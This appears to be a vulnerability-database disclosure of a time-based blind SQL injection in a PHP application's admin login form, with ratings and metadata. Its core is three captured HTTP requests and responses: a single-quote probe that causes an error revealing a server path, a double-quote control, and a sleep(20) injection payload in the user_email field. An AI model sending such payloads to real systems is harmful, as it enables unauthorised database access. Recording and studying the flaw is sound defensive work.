Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
3

CVE-nu11-101821
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Validated

Description

Description:

The user_email parameter appears to be vulnerable to SQL injection attacks Time-based Blind.
A single quote was submitted in the user_email parameter, and a general error message was returned.
Two single quotes were then submitted and the error message disappeared.

Add Assessment

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Easy to weaponizeGives privileged accessVulnerable in default configuration
Technical Analysis

CVE-nu11-101821

Vendor

MySQL Request-1:

POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

user_email=IlZWXHcK@nu11secur1tycollaborator.net'&user_pass=m2G%21b5m%21D8&btnLogin=%C2%9E%C3%A9e

MySQL Response-1:

Response 1
HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:37 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 7099
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Bootstrap core CSS -->


<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...
<b>Fatal error</b>: Uncaught Error: Call to undefined function mysql_error() in C:\xampp\htdocs\caiwl\include\accounts.php:28
Stack trace:
#0 C:\xampp\htdocs\caiwl\admin\login.php(165): User::userAuthentication('IlZWXHcK@burpco...', '0314337dea4e6aa...')
#1 {main}
thrown in <b>
...[SNIP]...

MySQL Request-2:

POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

user_email=ICpueGIm@nu11secur1tycollaborator.net''&user_pass=g1M%21g9l%21F1&btnLogin=%C2%9E%C3%A9e

MySQL Response-2

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:40 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6832
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Bootstrap core CSS -->


<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...

MySQL Request-3

POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

user_email=QXVzAYzI@nu11secur1tycollaborator.net'%2b(select*from(select(sleep(20)))a)%2b'&user_pass=u0U%21y2z%21D9&btnLogin=%C2%9E%C3%A9e

MySQL Response-3

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:51 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6811
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Bootstrap core CSS -->


<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...

Reproduce

href

Proof:

href

Log in to Add Reply

General Information

Offensive Application
exploit
Utility Class
privesc
Ports
Unknown
OS
Unknown
Vulnerable Versions
Unknown
Prerequisites
Unknown
Discovered By
nu11secur1ty
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
nu11secur1ty

References

Additional Info

Authenticated
Always
Exploitable
Always
Reliability
Very Weak
Stability
Very Weak
Available Mitigations
Very Weak
Shelf Life
Very Short
Userbase/Installbase
Very Small
Patch Effectiveness
Very Low
Technical Analysis